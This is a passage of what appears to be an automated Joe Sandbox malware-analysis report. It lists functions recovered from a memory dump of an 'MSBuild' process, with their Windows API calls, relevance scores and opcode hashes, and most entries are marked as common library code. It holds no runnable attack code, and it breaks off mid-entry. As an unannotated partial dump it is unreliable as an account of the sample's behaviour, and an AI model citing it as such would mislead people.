                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: FileFind$FirstH_prologNext
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 301083792-0
                                                                                                                        • Opcode ID: a2238446b186cea55353008a029da67e2f215ab24b44d608ebe4072823657bfc
                                                                                                                        • Instruction ID: 60446431aa0b45b5fc099c057f6d50f3e7887136e12703af2d86415be67689ac
                                                                                                                        • Opcode Fuzzy Hash: a2238446b186cea55353008a029da67e2f215ab24b44d608ebe4072823657bfc
                                                                                                                        • Instruction Fuzzy Hash: 357140328001099BCB15EBA1DC919EE7778AF54318F10427FE856B71E2EF386E45CB98
                                                                                                                        Function 00450E6A Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                                                          • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                                          • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                                                          • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                                          • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
                                                                                                                          • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F2B
                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450EBE
                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450F0F
                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450FCF
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorInfoLastLocale$_free$_abort
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2829624132-0
                                                                                                                        • Opcode ID: 022617d048d67c565bd8cd478daba609af81f9e307d0efc84ddd0a3e182c2dec
                                                                                                                        • Instruction ID: e92eb603d23812efeda5bde14236c6fbce748c008cf001f3fb8de25b7fcb8669
                                                                                                                        • Opcode Fuzzy Hash: 022617d048d67c565bd8cd478daba609af81f9e307d0efc84ddd0a3e182c2dec
                                                                                                                        • Instruction Fuzzy Hash: AC61D3365002079FDB289F24CD82BBB77A8EF04706F1041BBED05C6696E778D989DB58
                                                                                                                        Function 0043A65D Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,0000000A), ref: 0043A755
                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0000000A), ref: 0043A75F
                                                                                                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,0000000A), ref: 0043A76C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3906539128-0
                                                                                                                        • Opcode ID: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
                                                                                                                        • Instruction ID: 15fc2c217458336097e8e19d69e2940e7c5a4b77666d4e23b7e272f62fea865b
                                                                                                                        • Opcode Fuzzy Hash: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
                                                                                                                        • Instruction Fuzzy Hash: 2D31D47490121CABCB21DF64D98979DBBB8BF08310F5052EAE81CA7251E7349F81CF49
                                                                                                                        Function 00442554 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetCurrentProcess.KERNEL32(?,?,0044252A,?,0046DAE0,0000000C,00442681,?,00000002,00000000), ref: 00442575
                                                                                                                        • TerminateProcess.KERNEL32(00000000,?,0044252A,?,0046DAE0,0000000C,00442681,?,00000002,00000000), ref: 0044257C
                                                                                                                        • ExitProcess.KERNEL32 ref: 0044258E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Process$CurrentExitTerminate
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1703294689-0
                                                                                                                        • Opcode ID: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
                                                                                                                        • Instruction ID: 6e58600c80f72e94ca833af3256d2da28fe7ef7edb4b61bff2e48710a34f1207
                                                                                                                        • Opcode Fuzzy Hash: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
                                                                                                                        • Instruction Fuzzy Hash: 65E08C31004648BFDF016F14EE18A893F29EF10346F408475F80A8A632CFB9DE92CB88
                                                                                                                        Function 0044D5E9 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: .
                                                                                                                        • API String ID: 0-248832578
                                                                                                                        • Opcode ID: 97cc3c3166f0870dddbca3780dbfd7dbd2d9d0e9e098b336076252ce6a3ce59f
                                                                                                                        • Instruction ID: db76f937e81630575b2700384d205b0ac401e8f874fa32e43cac1aabc581782c
                                                                                                                        • Opcode Fuzzy Hash: 97cc3c3166f0870dddbca3780dbfd7dbd2d9d0e9e098b336076252ce6a3ce59f
                                                                                                                        • Instruction Fuzzy Hash: CB310471900209AFEB249E79CC84EEB7BBDDB86318F1101AEF91897251E6389D458B64
                                                                                                                        Function 00450D42 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                                                          • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                                          • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                                                          • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                                        • EnumSystemLocalesW.KERNEL32(00450E6A,00000001,00000000,?,<D,?,00451497,00000000,?,?,?), ref: 00450DB4
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                        • String ID: <D
                                                                                                                        • API String ID: 1084509184-3866323178
                                                                                                                        • Opcode ID: 99518e0148a584110f8bf4689e731d5402797eff59b4f7bbd4ab81c0230e503e
                                                                                                                        • Instruction ID: b1cdb4a87285138648e71eec5b58018a028c0508cbf90fbfa4a5e64eba390ba2
                                                                                                                        • Opcode Fuzzy Hash: 99518e0148a584110f8bf4689e731d5402797eff59b4f7bbd4ab81c0230e503e
                                                                                                                        • Instruction Fuzzy Hash: 9C11293B2007055FDB189F79D8916BAB7A1FF8031AB14442DE94647741D375B846C744
                                                                                                                        Function 00450DDD Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                                                          • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                                          • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                                                          • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                                        • EnumSystemLocalesW.KERNEL32(004510BA,00000001,?,?,<D,?,0045145B,<D,?,?,?,?,?,00443CEC,?,?), ref: 00450E29
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                        • String ID: <D
                                                                                                                        • API String ID: 1084509184-3866323178
                                                                                                                        • Opcode ID: e0c48b72e2c1269c4cdc51d0e461bd75820cdd7fcb75359b91497d16354a5322
                                                                                                                        • Instruction ID: d323619e2976bd52c5edaa4f55efd93dda7e8b303aa23e489220a9c0c916f3e4
                                                                                                                        • Opcode Fuzzy Hash: e0c48b72e2c1269c4cdc51d0e461bd75820cdd7fcb75359b91497d16354a5322
                                                                                                                        • Instruction Fuzzy Hash: 5BF0223A2003045FDB145F3AD882AAB7B95EF81729B25842EFD058B782D275AC42C644
                                                                                                                        Function 00447597 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004475EA
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: InfoLocale
                                                                                                                        • String ID: GetLocaleInfoEx
                                                                                                                        • API String ID: 2299586839-2904428671
                                                                                                                        • Opcode ID: 8dab955c83ead38f4190d8cd68b3baa1d28bcda2227728d0cef18aa89ebed625
                                                                                                                        • Instruction ID: 80a81796b135a3e0eaabc3ca7fb48afb6b687e063e78a0117ef0368584b3b56e
                                                                                                                        • Opcode Fuzzy Hash: 8dab955c83ead38f4190d8cd68b3baa1d28bcda2227728d0cef18aa89ebed625
                                                                                                                        • Instruction Fuzzy Hash: 82F0F031A44308BBDB11AF61EC06F6E7B25EF04712F00416AFC046A2A2CB359E11969E
                                                                                                                        Function 00440E20 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 5fe4b2cb4502993dbea9aed901accaaf97bf6201a09a40e91719f5fde44f0d4f
                                                                                                                        • Instruction ID: cffdc6bb8eb20f5336ace8b102e865ec7dcfb2cf624fb46ac032ba80a60d6a90
                                                                                                                        • Opcode Fuzzy Hash: 5fe4b2cb4502993dbea9aed901accaaf97bf6201a09a40e91719f5fde44f0d4f
                                                                                                                        • Instruction Fuzzy Hash: 8A024C71E002199BEF14CFA9C9806AEBBF1FF88314F25826AD919E7350D735AD45CB84
                                                                                                                        Function 004520D2 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,004520CD,?,?,00000008,?,?,00455412,00000000), ref: 004522FF
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ExceptionRaise
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3997070919-0
                                                                                                                        • Opcode ID: 10c23660bdf4a559c67b3dd21211c83afc8534fe451efaff8b0d30b37073b707
                                                                                                                        • Instruction ID: 47108b7899804ebb5d40a9255b8f0d240b678f8396b787326aeb691ef157153f
                                                                                                                        • Opcode Fuzzy Hash: 10c23660bdf4a559c67b3dd21211c83afc8534fe451efaff8b0d30b37073b707
                                                                                                                        • Instruction Fuzzy Hash: C0B18F351106089FD715CF28C586B567BE0FF06325F29869AEC99CF3A2C379E986CB44
                                                                                                                        Function 00432A49 Relevance: 1.8, Strings: 1, Instructions: 500COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 0
                                                                                                                        • API String ID: 0-4108050209
                                                                                                                        • Opcode ID: d7e2f1edd223cd44d70c9618c0c5ab444609e4c73f269a0cd31c5ec718f0b721
                                                                                                                        • Instruction ID: f72c02501a8b687524d4eed2bba9748ce27a8789a4669d3223b659a6f876a8a8
                                                                                                                        • Opcode Fuzzy Hash: d7e2f1edd223cd44d70c9618c0c5ab444609e4c73f269a0cd31c5ec718f0b721
                                                                                                                        • Instruction Fuzzy Hash: 8002B3727083004BD714DF39D95272EF3E2AFCC758F15492EF499AB391DA78A8058A4A
                                                                                                                        Function 004510BA Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                                                          • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                                          • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                                                          • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                                          • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
                                                                                                                          • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F2B
                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0045110E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$_free$InfoLocale_abort
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1663032902-0
                                                                                                                        • Opcode ID: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
                                                                                                                        • Instruction ID: 725ff80feb3504da526bb6f16fdbe645276de1ecdd37ac2f1e7666d8a95350e0
                                                                                                                        • Opcode Fuzzy Hash: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
                                                                                                                        • Instruction Fuzzy Hash: 2D21B332500606ABDB249A25DC46B7B73A8EB09316F1041BBFE01C6252EB79DD48CB99
                                                                                                                        Function 004512EA Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                                                          • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                                          • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                                                          • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                                        • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00451088,00000000,00000000,?), ref: 00451316
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$InfoLocale_abort_free
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2692324296-0
                                                                                                                        • Opcode ID: b6b1206c8d774c000a1b4b507e47eef55c4aaf57ff81984432bbf3fd36f42e7a
                                                                                                                        • Instruction ID: 964a9937ac5a020d26487979adcc3deadbef587b10f76395f6381cc8137ce6dd
                                                                                                                        • Opcode Fuzzy Hash: b6b1206c8d774c000a1b4b507e47eef55c4aaf57ff81984432bbf3fd36f42e7a
                                                                                                                        • Instruction Fuzzy Hash: 10F07D32500111BBEB286A25CC16BFF7758EB00716F15046BEC06A3651FA38FD49C6D4
                                                                                                                        Function 004470AE Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00444ACC: EnterCriticalSection.KERNEL32(-00471558,?,0044225B,00000000,0046DAC0,0000000C,00442216,0000000A,?,?,00448739,0000000A,?,00446F74,00000001,00000364), ref: 00444ADB
                                                                                                                        • EnumSystemLocalesW.KERNEL32(00447068,00000001,0046DC48,0000000C), ref: 004470E6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1272433827-0
                                                                                                                        • Opcode ID: 294c88a1965c44704c377604ff0a5917817e93c6b6b84f866ad5a3c5a2dedf6a
                                                                                                                        • Instruction ID: 877f7ae5c491a2fbf36f534f7b8138893028b6a81f24f5c3744eb9f6a7677366
                                                                                                                        • Opcode Fuzzy Hash: 294c88a1965c44704c377604ff0a5917817e93c6b6b84f866ad5a3c5a2dedf6a
                                                                                                                        • Instruction Fuzzy Hash: F6F04932A10200EFEB04EF68E806B4D77B0EB44725F10816AF414DB2E2DB7889818B49
                                                                                                                        Function 00450CF7 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                                                          • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                                          • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                                                          • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                                        • EnumSystemLocalesW.KERNEL32(00450C4E,00000001,?,?,?,004514B9,<D,?,?,?,?,?,00443CEC,?,?,?), ref: 00450D2E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1084509184-0
                                                                                                                        • Opcode ID: 8c2bccbfd0fc102635c006ca31f830fd57f68f19690e6c985b1f52cdbb333b18
                                                                                                                        • Instruction ID: ec648f77c102ae861fabd43d141f98194b25f4d0b1f390d0839222eb7000fb0b
                                                                                                                        • Opcode Fuzzy Hash: 8c2bccbfd0fc102635c006ca31f830fd57f68f19690e6c985b1f52cdbb333b18
                                                                                                                        • Instruction Fuzzy Hash: CBF05C3D30020557CB159F35D81576B7F94EFC2711B07405AFE098B381C239D846C754
                                                                                                                        Function 00433CD7 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(Function_00033CE3,004339B1), ref: 00433CDC
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3192549508-0
                                                                                                                        • Opcode ID: 3670727f3e8651977646328ecd403d2a1b3c6ba49dd5bfb528ab2007e995f695
                                                                                                                        • Instruction ID: 83953e3dca8a62111c248ad4478ddd9c1373f985a30770e5fc8846644fe13ce9
                                                                                                                        • Opcode Fuzzy Hash: 3670727f3e8651977646328ecd403d2a1b3c6ba49dd5bfb528ab2007e995f695
                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                        Function 0043CE3B Relevance: 1.5, Strings: 1, Instructions: 237COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: BG3i@
                                                                                                                        • API String ID: 0-2407888476
                                                                                                                        • Opcode ID: da6bc0b681a35a8a8cd82b5b62752965acc1f5aabf11132faead2372da36057a
                                                                                                                        • Instruction ID: a817909710d0090f483bb13cdd1d1ee80d6dfae79024daed79820ace932836b2
                                                                                                                        • Opcode Fuzzy Hash: da6bc0b681a35a8a8cd82b5b62752965acc1f5aabf11132faead2372da36057a
                                                                                                                        • Instruction Fuzzy Hash: E361777160070966DA385A2858D6BBF6396EB0DB04F10391BE943FF3C1D61DAD43874E
                                                                                                                        Function 0043CC0C Relevance: 1.5, Strings: 1, Instructions: 214COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 0
                                                                                                                        • API String ID: 0-4108050209
                                                                                                                        • Opcode ID: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
                                                                                                                        • Instruction ID: e47b97b21f836cd03f295ee90de6feb37cae4df0254a032430ab3cefd666e269
                                                                                                                        • Opcode Fuzzy Hash: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
                                                                                                                        • Instruction Fuzzy Hash: C851AC3160070457DF388A6985DA7BF6B959B0E700F18352FE48AFB382C60DED02979E
                                                                                                                        Function 00426E73 Relevance: 1.3, Strings: 1, Instructions: 96COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: @
                                                                                                                        • API String ID: 0-2766056989
                                                                                                                        • Opcode ID: 277f5b14ebfb31d9acdfcb19b599133ffeee57438103c682c3dacb2c81b16d7f
                                                                                                                        • Instruction ID: 4dd25ef8aece06dcbd44762d080e1d81d96ea4c89eb3931c7e752ffea448aa68
                                                                                                                        • Opcode Fuzzy Hash: 277f5b14ebfb31d9acdfcb19b599133ffeee57438103c682c3dacb2c81b16d7f
                                                                                                                        • Instruction Fuzzy Hash: 99417576A083158FC314CE29D18021BFBE1FBC8300F568A2EF99693350D679E980CB86
                                                                                                                        Function 00437150 Relevance: 1.3, Strings: 1, Instructions: 76COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: >G
                                                                                                                        • API String ID: 0-1296849874
                                                                                                                        • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                        • Instruction ID: d77b428d8deff70f46db9a150fef47e19855adfe796a652afc1ecdf390514463
                                                                                                                        • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                        • Instruction Fuzzy Hash: D1110BF724C18143EE74862DD8B46B7A795EACE320F2C636BD0C14B758D52A99459908
                                                                                                                        Function 0044E92E Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: HeapProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 54951025-0
                                                                                                                        • Opcode ID: c4eeb5daf7d20212f04cf1a35fe49476965deb7007d4ee0647dc212291e34da0
                                                                                                                        • Instruction ID: 9504a653bcf427532d5064532c05f1d04939bb5561e35e6535c2a7eba45b7a60
                                                                                                                        • Opcode Fuzzy Hash: c4eeb5daf7d20212f04cf1a35fe49476965deb7007d4ee0647dc212291e34da0
                                                                                                                        • Instruction Fuzzy Hash: 84A00270506201CB57404F756F0525937D9654559170580755409C5571D62585905615
                                                                                                                        Function 0044C739 Relevance: .6, Instructions: 637COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: b5ca945c73f96586680b794a2cfc8b55e8f7bc2f58380cec5295694457d85c5e
                                                                                                                        • Instruction ID: 1fbb2d6a6e610910e1865e113166bba559d0ad1400e2c5ed2b94208389d41108
